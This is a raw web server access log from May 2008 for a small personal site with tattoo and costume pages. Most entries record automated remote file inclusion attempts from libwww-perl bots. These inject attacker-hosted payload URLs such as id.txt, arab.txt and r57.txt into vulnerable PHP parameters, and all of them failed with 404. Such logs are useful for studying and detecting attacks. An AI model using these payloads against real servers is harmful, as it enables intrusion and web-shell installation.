201.6.252.7 - - [09/May/2008:23:40:50 -0500] "GET /index1.php?x=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.800"
64.42.243.129 - - [09/May/2008:23:42:40 -0500] "GET /logs/access_log.1207180800//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://casinojeton.de/id2.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.805"
85.214.26.250 - - [09/May/2008:23:44:27 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 325 "-""libwww-perl/5.69"
85.214.26.250 - - [09/May/2008:23:44:27 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 320 "-""libwww-perl/5.69"
77.79.246.70 - - [09/May/2008:23:44:32 -0500] "GET /logs/access_log.1207785600//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.65"
77.79.246.70 - - [09/May/2008:23:44:32 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.65"
77.79.246.70 - - [09/May/2008:23:44:33 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.65"
67.195.98.220 - - [09/May/2008:23:45:42 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
77.79.246.70 - - [09/May/2008:23:46:29 -0500] "GET /logs/access_log.1207180800//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.65"
58.26.137.64 - - [09/May/2008:23:48:11 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.69"
58.26.137.64 - - [09/May/2008:23:48:12 -0500] "GET //skin/zero_vote/error.php?dir=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.69"
82.165.183.49 - - [09/May/2008:23:54:31 -0500] "GET /logs/access_log.1207785600//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://casinojeton.de/arab.txt? HTTP/1.1" 404 366 "-""libwww-perl/5.79"
82.165.183.49 - - [09/May/2008:23:54:31 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://casinojeton.de/arab.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
82.165.183.49 - - [09/May/2008:23:54:31 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://casinojeton.de/arab.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
74.6.17.174 - - [09/May/2008:23:54:46 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.28.239 - - [09/May/2008:23:54:47 -0500] "GET /logs/access_log.1187136000 HTTP/1.0" 200 214355 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
82.165.183.49 - - [09/May/2008:23:57:27 -0500] "GET /logs/access_log.1207180800//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://casinojeton.de/arab.txt? HTTP/1.1" 404 366 "-""libwww-perl/5.79"
85.12.14.35 - - [10/May/2008:00:00:48 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.halo2ninja.com/downloads/.../arab.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.64"
85.12.14.35 - - [10/May/2008:00:00:49 -0500] "GET //appserv/main.php?appserv_root=http://www.halo2ninja.com/downloads/.../arab.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.64"
74.6.9.152 - - [10/May/2008:00:02:22 -0500] "GET /logs/access_log.1182988800 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
190.50.171.50 - - [10/May/2008:00:04:56 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Tattoo_flash""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14;MEGAUPLOAD 1.0"
190.50.171.50 - - [10/May/2008:00:04:56 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14;MEGAUPLOAD 1.0"
190.50.171.50 - - [10/May/2008:00:04:56 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14;MEGAUPLOAD 1.0"
190.50.171.50 - - [10/May/2008:00:04:57 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14;MEGAUPLOAD 1.0"
190.50.171.50 - - [10/May/2008:00:05:07 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14;MEGAUPLOAD 1.0"
190.50.171.50 - - [10/May/2008:00:05:08 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14;MEGAUPLOAD 1.0"
190.50.171.50 - - [10/May/2008:00:05:08 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14;MEGAUPLOAD 1.0"
190.50.171.50 - - [10/May/2008:00:05:08 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14;MEGAUPLOAD 1.0"
190.50.171.50 - - [10/May/2008:00:05:08 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14;MEGAUPLOAD 1.0"
190.50.171.50 - - [10/May/2008:00:05:09 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14;MEGAUPLOAD 1.0"
190.50.171.50 - - [10/May/2008:00:05:09 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14;MEGAUPLOAD 1.0"
190.50.171.50 - - [10/May/2008:00:05:09 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14;MEGAUPLOAD 1.0"
190.50.171.50 - - [10/May/2008:00:05:09 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14;MEGAUPLOAD 1.0"
190.50.171.50 - - [10/May/2008:00:05:10 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14;MEGAUPLOAD 1.0"
190.50.171.50 - - [10/May/2008:00:05:10 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14;MEGAUPLOAD 1.0"
83.149.123.164 - - [10/May/2008:00:07:04 -0500] "GET /logs/header.php?tpl_pgb_moddir=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
83.149.123.164 - - [10/May/2008:00:07:05 -0500] "GET /header.php?tpl_pgb_moddir=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
67.195.98.217 - - [10/May/2008:00:08:16 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
124.217.249.76 - - [10/May/2008:00:08:32 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kelserific3.iespana.es/r57.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
124.217.249.76 - - [10/May/2008:00:08:33 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kelserific3.iespana.es/r57.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
74.94.170.50 - - [10/May/2008:00:10:21 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kelserific3.iespana.es/r57.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.800"
74.94.170.50 - - [10/May/2008:00:10:22 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kelserific3.iespana.es/r57.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.800"
65.55.208.121 - - [10/May/2008:00:12:43 -0500] "GET /logs/access_log.1167091200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
83.149.123.164 - - [10/May/2008:00:14:05 -0500] "GET /logs/errors.php?error=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
83.149.123.164 - - [10/May/2008:00:14:05 -0500] "GET /errors.php?error=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
74.6.27.58 - - [10/May/2008:00:24:10 -0500] "GET /logs/access_log.1193702400 HTTP/1.0" 200 190927 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.179.236 - - [10/May/2008:00:25:57 -0500] "GET /logs/access_log.1164585600 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
211.20.85.150 - - [10/May/2008:00:26:23 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
64.42.243.129 - - [10/May/2008:00:26:24 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://www.halo2ninja.com/downloads/.../id2.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
64.42.243.129 - - [10/May/2008:00:26:24 -0500] "GET //appserv/main.php?appserv_root=http://www.halo2ninja.com/downloads/.../id2.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
64.42.243.129 - - [10/May/2008:00:26:24 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.halo2ninja.com/downloads/.../id2.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
64.42.243.129 - - [10/May/2008:00:27:14 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://www.halo2ninja.com/downloads/.../id2.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
65.55.208.135 - - [10/May/2008:00:27:21 -0500] "GET /logs/access_log.1156204800 HTTP/1.1" 200 156191 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
208.115.34.17 - - [10/May/2008:00:28:16 -0500] "GET /logs/access_log.1207785600/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
208.115.34.17 - - [10/May/2008:00:28:16 -0500] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
208.115.34.17 - - [10/May/2008:00:28:16 -0500] "GET /logs/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
208.115.34.17 - - [10/May/2008:00:28:36 -0500] "GET /logs/access_log.1181952000/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
216.9.250.64 - - [10/May/2008:00:28:45 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "-""BlackBerry8830/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/104"
216.9.250.64 - - [10/May/2008:00:28:46 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.0" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""BlackBerry8830/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/104"
216.9.250.29 - - [10/May/2008:00:28:46 -0500] "GET /tattoo/webring.jpg HTTP/1.0" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""BlackBerry8830/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/104"
216.9.250.28 - - [10/May/2008:00:28:46 -0500] "GET /favicon.ico HTTP/1.0" 404 283 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""BlackBerry8830/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/104"
64.42.243.129 - - [10/May/2008:00:30:00 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://www.aikido-steyr.at/aikinews/parse/smilies/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
64.42.243.129 - - [10/May/2008:00:30:00 -0500] "GET //appserv/main.php?appserv_root=http://www.aikido-steyr.at/aikinews/parse/smilies/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
64.42.243.129 - - [10/May/2008:00:30:00 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.aikido-steyr.at/aikinews/parse/smilies/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
64.42.243.129 - - [10/May/2008:00:30:46 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://www.aikido-steyr.at/aikinews/parse/smilies/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
61.222.167.228 - - [10/May/2008:00:30:51 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/dalnethacker/suksesdalhackscan.txt?????? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
61.222.167.228 - - [10/May/2008:00:30:52 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/dalnethacker/suksesdalhackscan.txt?????? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
189.25.246.196 - - [10/May/2008:00:33:02 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.812"
189.25.246.196 - - [10/May/2008:00:33:03 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
207.58.138.166 - - [10/May/2008:00:36:57 -0500] "GET /logs/access_log.1207785600/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.811"
207.58.138.166 - - [10/May/2008:00:36:57 -0500] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
207.58.138.166 - - [10/May/2008:00:36:57 -0500] "GET /logs/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
207.58.138.166 - - [10/May/2008:00:37:12 -0500] "GET /logs/access_log.1181952000/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.811"
67.195.37.172 - - [10/May/2008:00:37:26 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.172 - - [10/May/2008:00:37:27 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.12.14.35 - - [10/May/2008:00:46:17 -0500] "GET /logs/modules/my_egallery/index.php?do=http://www.halo2ninja.com/downloads/.../arab.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.64"
85.12.14.35 - - [10/May/2008:00:46:17 -0500] "GET /modules/my_egallery/index.php?do=http://www.halo2ninja.com/downloads/.../arab.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.64"
189.25.246.196 - - [10/May/2008:00:47:23 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.812"
189.25.246.196 - - [10/May/2008:00:47:26 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.812"
151.1.233.89 - - [10/May/2008:00:51:57 -0500] "GET /logs/errors.php?error=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
151.1.233.89 - - [10/May/2008:00:51:57 -0500] "GET /errors.php?error=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
85.12.14.35 - - [10/May/2008:00:53:30 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://www.halo2ninja.com/downloads/.../arab.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.64"
85.12.14.35 - - [10/May/2008:00:53:30 -0500] "GET //appserv/main.php?appserv_root=http://www.halo2ninja.com/downloads/.../arab.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.64"
85.12.14.35 - - [10/May/2008:00:53:31 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.halo2ninja.com/downloads/.../arab.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.64"
85.12.14.35 - - [10/May/2008:00:54:06 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://www.halo2ninja.com/downloads/.../arab.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.64"
83.149.123.164 - - [10/May/2008:01:00:24 -0500] "GET /logs/access_log.1207008000//Neos_Chronos/header.php?base_folder=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
83.149.123.164 - - [10/May/2008:01:00:25 -0500] "GET //Neos_Chronos/header.php?base_folder=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
83.149.123.164 - - [10/May/2008:01:00:26 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
208.115.34.17 - - [10/May/2008:01:01:49 -0500] "GET /logs/access_log.1207008000/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
208.115.34.17 - - [10/May/2008:01:01:49 -0500] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
208.115.34.17 - - [10/May/2008:01:01:50 -0500] "GET /logs/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
208.115.34.17 - - [10/May/2008:01:01:54 -0500] "GET /logs/access_log.1207785600/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
83.149.123.164 - - [10/May/2008:01:03:54 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
67.195.37.172 - - [10/May/2008:01:04:50 -0500] "GET /tattoo/ HTTP/1.0" 200 466 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.31.93 - - [10/May/2008:01:06:06 -0500] "GET /?N=A HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
189.25.246.196 - - [10/May/2008:01:06:17 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
189.25.246.196 - - [10/May/2008:01:06:19 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.812"
80.65.76.195 - - [10/May/2008:01:06:57 -0500] "GET /logs/access_log.1207008000/faqsupport.php//samplefaqsupport.php?path%5Bdocroot%5D=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
80.65.76.195 - - [10/May/2008:01:07:00 -0500] "GET /faqsupport.php//samplefaqsupport.php?path%5Bdocroot%5D=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
80.65.76.195 - - [10/May/2008:01:07:03 -0500] "GET /logs/faqsupport.php//samplefaqsupport.php?path%5Bdocroot%5D=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
80.65.76.195 - - [10/May/2008:01:08:44 -0500] "GET /logs/access_log.1207785600/faqsupport.php//samplefaqsupport.php?path%5Bdocroot%5D=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
63.247.138.209 - - [10/May/2008:01:10:38 -0500] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
208.115.34.17 - - [10/May/2008:01:12:10 -0500] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
67.195.37.172 - - [10/May/2008:01:13:23 -0500] "GET /?M=A HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.246.61.4 - - [10/May/2008:01:14:07 -0500] "GET /logs/squirrelcart/cart_content.php?cart_isp_root=http://www.cntb-rzd.ru//modules/4nAlbum/public/r.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
213.246.61.4 - - [10/May/2008:01:14:07 -0500] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.cntb-rzd.ru//modules/4nAlbum/public/r.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
207.58.138.166 - - [10/May/2008:01:14:50 -0500] "GET /logs/access_log.1207008000/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.811"
207.58.138.166 - - [10/May/2008:01:14:50 -0500] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
207.58.138.166 - - [10/May/2008:01:14:50 -0500] "GET /logs/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
207.58.138.166 - - [10/May/2008:01:14:52 -0500] "GET /logs/access_log.1207785600/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.811"
80.65.76.195 - - [10/May/2008:01:15:19 -0500] "GET /logs/access_log.1207008000/faqsupport.php//samplefaqsupport.php?path%5Bdocroot%5D=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
80.65.76.195 - - [10/May/2008:01:15:22 -0500] "GET /faqsupport.php//samplefaqsupport.php?path%5Bdocroot%5D=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
80.65.76.195 - - [10/May/2008:01:15:25 -0500] "GET /logs/faqsupport.php//samplefaqsupport.php?path%5Bdocroot%5D=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
65.55.208.135 - - [10/May/2008:01:16:02 -0500] "GET /logs/access_log.1205452800 HTTP/1.1" 200 266071 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
80.65.76.195 - - [10/May/2008:01:17:03 -0500] "GET /logs/access_log.1207785600/faqsupport.php//samplefaqsupport.php?path%5Bdocroot%5D=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
66.109.18.92 - - [10/May/2008:01:19:10 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://220-133-170-132.hinet-ip.hinet.net/appserv/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.808"
66.109.18.92 - - [10/May/2008:01:19:10 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://220-133-170-132.hinet-ip.hinet.net/appserv/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.808"
83.149.123.164 - - [10/May/2008:01:19:19 -0500] "GET /logs/access_log.1207180800/main.php?appserv_root=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
83.149.123.164 - - [10/May/2008:01:19:19 -0500] "GET /main.php?appserv_root=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
83.149.123.164 - - [10/May/2008:01:19:19 -0500] "GET /logs/main.php?appserv_root=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
67.195.37.172 - - [10/May/2008:01:22:43 -0500] "GET /?N=D HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.7.98 - - [10/May/2008:01:23:50 -0500] "GET /logs/access_log.1157673600 HTTP/1.0" 200 258631 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
83.149.123.164 - - [10/May/2008:01:24:20 -0500] "GET /logs/access_log.1204761600/main.php?appserv_root=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
67.195.37.172 - - [10/May/2008:01:24:55 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.232.214.82 - - [10/May/2008:01:27:09 -0500] "GET /logs/modules/xfsection/modify.php?dir_module=http://nodaorlz.100webspace.net/test.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
